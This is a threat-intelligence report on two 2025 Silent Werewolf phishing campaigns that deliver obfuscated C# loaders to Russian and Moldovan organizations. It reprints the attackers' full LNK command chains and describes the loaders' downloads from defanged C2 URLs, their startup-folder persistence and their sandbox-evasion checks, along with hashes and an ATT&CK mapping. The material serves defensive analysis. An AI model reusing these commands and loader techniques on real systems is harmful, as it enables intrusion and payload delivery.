Malware or LLM? Silent Werewolf employs new loaders to attack Russian and Moldovan organizations
In March 2025, BI.ZONE Threat Intelligence uncovered two new campaigns by Silent Werewolf. The first one focused on Russian organizations exclusively while the second targeted both Moldovan and, presumably, Russian companies. The attackers employed two separate loader instances to retrieve the malicious payload from their C2 server. Unfortunately, the payload itself was not available at the time of this research. However, a retrospective analysis of similar Silent Werewolf campaigns suggests that the threat actor used XDigo malware.
Adversaries often send phishing emails impersonating major or well‑known organizations or reference them for credibility. The stronger a brand, the more likely threat actors are to exploit its identity. Recognizable logos and other branding elements make phishing emails appear more authentic, prompting victims to open them. It is important to remember that the brands cannot be liable for the actions of criminals and associated damage.
- Phishing emails remain the adversaries’ preferred technique for targeted attacks, particularly those involving espionage.
- The threat actor hinders payload retrieval to impede further analysis.
- The extensive use of legitimate tools and malware code obfuscation allows the attackers to stay undetected for longer periods to achieve their goals.
Target countries: Russia
Target industries: energy (nuclear), aircraft, instrumentation and mechanical engineering
Start date: 2025-03-11
The adversaries distributed a previously unknown obfuscated loader coded in C#. It was disguised as a pre-action letter addressed to the chairman of the Presidium of the Almaty City Bar Association and a residential construction project.
To deliver the malicious payload, the attackers distributed phishing emails containing a download link to a ZIP file. The archive included an LNK file and a nested ZIP. The latter encompassed a legitimate executable, a malicious DLL, and a decoy PDF.
We discovered two ZIP files, proyekt.zip and dokazatelstva.zip (fig. 1 and fig. 2).
These archives comprise the following:
- An LNK file used to extract the nested archive and trigger the next stage.
- A ZIP file disguised as a
.iniconfiguration file, including:- a decoy PDF
- the legitimate executable
DeviceMetadataWizard.exe(version 10.0.17763.132), digitally signed by Microsoft Corporation - a malicious DLL that serves as a .NET loader
The LNK file finds the downloaded archive in the %USERPROFILE% directory. It also compiles the JScript.NET code embedded in the LNK to unpack the contents of the nested ZIP into a designated directory. It then runs the extracted legitimate executable, which in turn loads the malicious DLL (the C# loader).
Here is a command example from доказательства_0007093.lnk:
cmd.exe /c "set PATH=%windir%\system32;%PATH% & (for /R "%USERPROFILE%" %f in (dokazatelstva.zip) do @IF EXIST %f (chcp 65001 | echo | set /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a & for /f %j in ('dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe"') do @set "_jsc=%j" & for /L %i in (1,1,3) do @if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit) else (@if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") else (@if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")))) ))"
This command triggers the following sequence:
cmd.exe /c «set PATH=%windir%\system32;%PATH%adds a path to thesystem32directory within the PATH environment variable, enabling access to system programs.for /R „%USERPROFILE%“ %f in (dokazatelstva.zip) do @IF EXIST %f (...)runs a recursive search fordokazatelstva.zipin the%USERPROFILE%directory. If found, executes the@IF EXISTblock, where:chcp 65001sets the encoding system to UTF-8.echo | set /p="<JScript.NET-код>" >%TEMP%\UKSS1G4Q7H6S.aa creates a file with a JScript.NET code.for /f %j in (’dir /b /s /a:-d /o:-n "%SystemRoot%\Microsoft.Net\Framework\*jsc.exe&"’) do @set «_jsc=%j"searches for an EXE compiler (JScript.NET Compiler).for /L %i in (1,1,3) doruns the loop three times as follows:@if exist "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" (^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit)checks for the legitimate executable. If found, runs it. If not, goes to the next condition.@if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7")checks forunzip.exe. If found, runs it with the parameters%f(path todokazatelstva.zip) and"%USERPROFILE%\J8ZUARAW71W7. If not, goes to the next condition.@if not exist %TEMP%\unzip.exe_ (@if not exist %TEMP%\unzip.exe (C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a"))checks forunzip.exe_andunzip.exe. If neither exists, compiles%TEMP%\UKSS1G4Q7H6S.ainto%TEMP%\unzip.exeby using thejsc.execompiler. The compilation is invoked throughforfiles.exe.
The unzip.exe file extracts the contents of the original ZIP into the designated directory, unpacks the nested ZIP, and renames itself to unzip.exe_ (fig. 3).
unzip.exe
The C# loader is a d3d9.dll library that is accessed via the H5GDXM70NJ.exe legitimate executable (DeviceMetadataWizard.exe) through DLL side-loading. The loader retrieves the malicious payload from the C2 server, saves it to the host’s startup folder, and opens the decoy PDF.
The loader code is obfuscated, its strings encoded with Base64 and encrypted with XOR using a UTF‑8 string key (fig. 4). Each loader instance employs a unique XOR key.
The C# loader has the following capabilities:
- Checks startup arguments.
- If run with the
/startupargument, executes the downloaded malicious payload%APPDATA%\74EJ6RTFKKRS\yfutozlv.exe. - If run without arguments, copies the
test.cfgdecoy to%USERPROFILE%\Documents\dokazatelstva.pdfand opens it via the explorer command%USERPROFILE%\Documents\dokazatelstva.pdf. - Creates an asynchronous task to download the malicious payload from the URL indicated in the loader configuration data (e.g., hxxps://pdf-bazaar[.]com/files2025/?pti=npu&yay=3oKPkD33tx5Tuzz). When calling the server, uses the following User-Agent header string:
“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36”. The server response is decoded with Base64 and decrypted with the XOR key used for the encrypted strings. The contents are decoded again using Base64, then the loader creates the%APPDATA%\74EJ6RTFKKRSworking directory and writes the final payload to%APPDATA%\74EJ6RTFKKRS\yfutozlv.exe. - Within the same asynchronous task, spawns a separate thread and calls a function that copies
H5GDXM70NJ.exeandd3d9.dllto the%APPDATA%\74EJ6RTFKKRSdirectory. Then, to gain persistence, creates thestartapp.batbatch script in the startup folder. This script executes%APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exewith the/startupargument. - Within the same asynchronous task, spawns a separate thread and calls a function that executes the downloaded malicious payload
%APPDATA%\74EJ6RTFKKRS\yfutozlv.exe.
The adversaries appear to run checks on target systems. If a target host does not meet certain criteria, the Llama 2 large language model (LLM) in GGUF format is downloaded from hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf (fig. 5). This hinders comprehensive analysis of the entire attack and allows the threat actor to bypass defenses such as sandboxes.
llama-2-70b.Q5_K_M.gguf from the C2 server instead of the malicious payload
Decoy examples are shown in fig. 6 and fig. 7.
test.cfg (dokazatelstva.pdf)
test.cfg (proyekt.pdf)
Target countries: Moldova, Russia (presumably)
Target industries: n/a
Start date: 2025-03-18
A new version of the C# loader was disguised as an official vacation schedule and recommendations for protecting corporate information infrastructure against ransomware attacks. This time, Silent Werewolf focused on Moldovan and Russian organizations.
As in the previous campaign, the adversaries seemed to leverage phishing to distribute malicious emails containing a download link to a ZIP archive.
We discovered two ZIP files, Grafik_SL_0525.zip and Rekomendatsii_032025.pdf.zip.
These archives comprise the following:
Grafik_SLlnk/Rekomendatsii_032025.pdf.lnk, a malicious LNK file that includes a command to extract a nested ZIP and trigger the next stage.config.bin, a file that includes CMD shell commands, an MSBuild task project, the task’s original C# source code, and an encrypted and encoded payload. The latter contains a decoy PDF, two legitimate DLLs (Microsoft.Build.Utilities.Core.dllandMicrosoft.Build.Utilities.Core.dll), and a malicious DLL that serves as the C# loader.aini.dat, a file that includes random data not used by the malware.
The LNK file invokes the forfiles.exe utility to recursively search the %USERPROFILE% directory for a ZIP file matching the *[archive_name] mask (e.g., *Grafik_SL_0525.zip). The contents of each archive found are extracted to the %TEMP% folder using PowerShell. The config.bin is then read and commands are executed string by string in cmd.exe in silent mode (the /q flag).
Obfuscated LNK command:
forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "po0x77e0x720x73he0x6cl -c Expand-Archive -F @path %TEMP%|out-null;type ($env:TMP + '\config.bin') |c0x6d0x64.e0x780x65 /q|out-null"
Deobfuscated LNK command:
forfiles.exe /p %USERPROFILE% /s /m *Grafik_SL_0525.zip /c "powershell.exe -c Expand-Archive -F '[путь к архиву Grafik_SL_0525.zip]' %TEMP%|out-null;type ($env:TMP + '\config.bin') |cmd.exe /q|out-null"
The config.bin file includes the following batch commands executed string by string:
mkdir %USERPROFILE%\Searches\winrt-{[GUID]}\copy /Y %TEMP%\config.bin %USERPROFILE%\Searches\winrt-{[GUID]}\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe %USERPROFILE%\Searches\winrt-{[GUID]}\config.bin >nul 2>&1exit
Example of a newly created directory: %USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}.
As a result, a working directory is created at %USERPROFILE%\Searches\winrt-{[GUID]}. The config.bin file is copied here and then MSBuild is invoked to compile and execute a Build task (fig. 8).
Compiling and executing an MSBuild task:
exe C:\Users\[USERNAME]\Searches\winrt-{[GUID]}\config.binexe" /noconfig /fullpaths @"%Temp%\[TEMP_DIRNAME]\[TEMP_FILENAME].cmdline"exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%Temp%\[TEMP_FILENAME].tmp" "%Temp%\[TEMP_DIRNAME]\[TEMP_FILENAME].TMP"
config.bin
The Build task initiates two subtasks: TaskCreator and [A-Za-z0-9]{10,14} (e.g., B0xy2l4pee34×9).
TaskCreator reads encrypted and encoded files embedded in config.bin, decrypts, decodes, and reconstructs these files, and opens a decoy PDF (%TEMP%\(Grafik_SL_0525.pdf|Rekomendatsii_032025.pdf)). The files embedded in config.bin are encrypted using a Caesar (shift) cipher and encoded using Base64 (fig. 9). The TaskCreator code serves as a dropper.
config.bin
Decrypted and decoded files comprise:
Grafik_SLpdf / Rekomendatsii_032025.pdf, a decoy PDF.[TASK_NAME].tmp, a malicious DLL that serves as the C# loader. The DLL name is indicated inconfig.binand varies from case to case (e.g.,B0xy2l4pee34×9.tmp).Microsoft.Build.Framework.dll, a legitimate file.Microsoft.Build.Utilities.Core.dll, a legitimate file.
The C# loader runs with the following Base64-encoded parameters (fig. 10):
- Path to the working directory.
- XOR key to decrypt the malicious payload.
- URL for downloading the malicious payload.
- User-Agent header string.
- Name for the downloaded file.
- Parameter to check certain conditions within the program.
B0xy2l4pee34×9 task in config.bin
One of the loader runs, for example, uses the following decoded parameters: “%USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\”, “BSX4neaFa5zahRcCcSxGudPU8GprbySA”, “hxxps://myupload[.]net/pismo/Grafik_SL_0525/?xwre=VbU5NQSLczxyvEDVzIDZR6Z3Hwp48u1m”, “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36”, “MemoryDataProcess.exe”, “ea”.
A randomly named task (B0xy2l4pee34×9) invokes the C# loader in the form of a DLL, with its code obfuscated using Obfuscar. Before executing its core code, the loader checks startup conditions to verify that the decoded XOR key (parameter 2) contains a substring (parameter 6) at a specific offset, the username is not “JohnDoe”, the machine name is not “HAL9TH”, and the NUMBER_OF_PROCESSORS variable is not null. If either of these conditions is not met, the loader terminates (fig. 11).
The loader decodes Base64-encoded strings received as parameters. It then creates and deletes from 100 to 200 random files within the working directory %USERPROFILE%\Searches\winrt-{[GUID]}\[RANDOM_NAME]. Afterward, it downloads an XOR-encrypted malicious payload from the specified URL (hxxps[://]myupload[.]net/pismo/Grafik_SL_0525/?xwre=BrNCqgeaXXo94U18qUGqii5PpjGTk2va), saves it to the working directory (%USERPROFILE%\Searches\winrt-{21b2da6e-5f63-4b3a-8606-fd6a2286307d}\MemoryDataProcess.exe), decrypts and executes it. The payload is a PE file.
Decoy examples are shown in fig. 12 and fig. 13.
Grafik_SL_0525.pdf
Rekomendatsii_032025.pdf
ZIP
e14fdb6c0b5b64e1ca318b7ad3ac9a4fd6dec60ef03089b87199306eba6e0ca659b907430dde62fc7a0d1c33c38081b7dcf43777815d1abcf07e0c77f76f5894
LNK
9c1acde0627da8b518b0522d6fed15cecf35b20ed8920628e9f580cfc3f450ed0b705938e0063e73e03645e0c7a00f7c8d8533f1912eab5bf9ad7bc44d2cf9c3cfd0d56ca3d6c9ca232252570522c4b904be2807c461276979b1f8c551ccd4aa536cd589cd685806b4348b9efa06843a90decae9f4135d1b11d8e74c7911f37d
Loader
95060ba948948eea9bfc801731960b97d3efceb300622630afcbccfe12c21ccd5e34d754b0a938de7e512614f8fc6d7cd6c704f76b05044e07c97bd44bd5d591448245612a5388074e32251a0b44769170c586cc4c2ae06cd953c7a461ce34a6f3f2c3c5836ce6e3cb92aa6dfc0f133e15a7fd169a3d1049b7d82e49d1577273
Domains
file-bazar[.]compdf-bazaar[.]compdfdepozit[.]comvashazagruzka365[.]com
ZIP
3b283c67f597b926784d9cc07b6a4020f422dcbc1b669c67d993606e663dc5ea23e1cde0493f7444508d56fabd6883f476b790b262040a90ae00beb31b85279c56f62aa193a254ea2607bb1f42971ebbe4e69631d0afb1f80beb6a89b83046caaf30d6c9431def22b93c52e7d7ba57a4290bbe6c94c7f822f0a5423c50671211
LNK
6c8916e453c0fdcd9d4e1164d1f30c38ebe65aa6d26a0fb3f5586ed3fd33d1e978a4e323910a0353d10fa19f8b003697d9d675ee9f15089d54dcfd8b7a9815c2b923c1ee29c8fc5f96aae5128b6a4d414dd755ec0e11dbf636f7b92ba1e3d13e0d1b0d35dbf72bd6518d663eb0d66a91683e94435d3659d310e202e8c169d73a
Dropper (config.bin)
3d49a2ca08b48838fde89d3f349e08de3b58f3f9ddcdd07c8dff7559b5f01cba47b2b73e87bf21a076c7bfba34d5eee5a136d3d43d19679d14f705db034a97d7c10d77e36dba3b410480359812c771c2185b0c586bd5e23a6d2454aba45208f2ea89ca6c00aea17ea97374e08c93e57fe2cf73a6ea36024cd659d757b51bda41
aini.dat (random data file, not used)
aini.dat 9cb6e6b8b81e97645760cc6d05298c7079565a5c6c9de3fb760e771bb699e583aini.dat b4f57e04bc7d0df696ece85ff6f9b306a4e2925c6fdb1e68c80726a974534ff3
Loader
73d35df23a6cce8c8b941730dec16b1f10945725ba696c7db784a5e4b65d4aa30d730d64432a80f950c0685f451606fde5dc27f7a58dcfe978c4cd784a08b0efd8bf46a9919806112200cb52f6c235726d1b8102de1231ae4a956b7d292063bac8268c6d2aa536937366f242abdfdae0b5432d6abc2680c4577ac2a252010182
Domains
myupload[.]netnews365[.]tech
| Tactic | Техника | Процедура |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Link |
Silent Werewolf uses links in phishing emails to load malware |
| Execution |
Command and Scripting Interpreter: PowerShell |
Silent Werewolf uses a malicious LNK file to execute |
|
Command and Scripting Interpreter: Windows Command Shell |
Silent Werewolf uses a malicious LNK file to execute |
|
|
User Execution: Malicious Link |
Silent Werewolf tricks a user into clicking a link that downloads a ZIP archive containing malicious files |
|
|
User Execution: Malicious File |
The victim must execute a malicious LNK file to initiate the system compromise |
|
| Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Silent Werewolf uses a C# loader to create the |
| Defense Evasion |
Deobfuscate/Decode Files or Information |
Silent Werewolf uses TaskCreator from Silent Werewolf uses a C# loader with Base64‑decoded and XOR-decrypted strings |
|
Hijack Execution Flow: DLL |
Silent Werewolf leverages DLL side-loading to access a malicious C# loader DLL through the legitimate executable |
|
|
Indicator Removal: File Deletion |
Silent Werewolf uses a C# loader that creates and deletes from 100 to 200 random files within the malware’s working directory |
|
|
Indirect Command Execution |
Silent Werewolf employs |
|
|
Masquerading: Rename Legitimate Utilities |
Silent Werewolf disguises a C# loader as a DirectX 9.0 library ( |
|
|
Masquerading: Double File Extension |
Silent Werewolf uses the double extension |
|
|
Obfuscated Files or Information: Compile After Delivery |
Silent Werewolf uses the |
|
|
Obfuscated Files or Information |
Silent Werewolf uses Obfuscar to obfuscate a C# loader. Silent Werewolf leverages Base64 and XOR to encrypt strings in a C# loader |
|
|
Obfuscated Files or Information: Embedded Payloads |
Silent Werewolf uses |
|
|
Obfuscated Files or Information: Command Obfuscation |
Silent Werewolf uses obfuscated commands in malicious LNK files |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
Silent Werewolf leverages Base64 and XOR (in some cases, XOR alone) to decode and decrypt the final payload executable downloaded from the C2 server |
|
|
Trusted Developer Utilities Proxy Execution: MSBuild |
Silent Werewolf uses |
|
|
Virtualization / Sandbox Evasion: System Checks |
Silent Werewolf leverages loader-embedded checks (e.g., for username, computer name, and number of processors) |
|
| Command and Control |
Application Layer Protocol: Web Protocols |
Silent Werewolf uses HTTPS to download an encrypted payload file from the C2 server |
|
Ingress Tool Transfer |
Silent Werewolf employs custom C# loaders to download malicious payload from the C2 server |
Phishing is one the most popular attack vectors against organizations. You can leverage dedicated services such as BI.ZONE Mail Security to filter out unwanted messages and protect your email communications. The solution carefully examines every incoming message to identify and block illegitimate content. BI.ZONE Mail Security uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This kind of inspection does not slow down the delivery of secure emails.
Attacks similar to those by Silent Werewolf are not only critical to detect but also to neutralize before they affect the infrastructure. To protect your company against advanced threats, we recommend implementing endpoint detection and response practices, for instance, BI.ZONE EDR. The service enables early detection of attacks and immediate incident response, either automated or manual.